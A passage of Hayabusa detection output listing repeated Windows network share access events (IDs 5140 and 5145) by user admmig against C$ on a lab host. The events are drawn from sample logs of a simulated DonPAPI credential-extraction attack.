Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network 
Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share 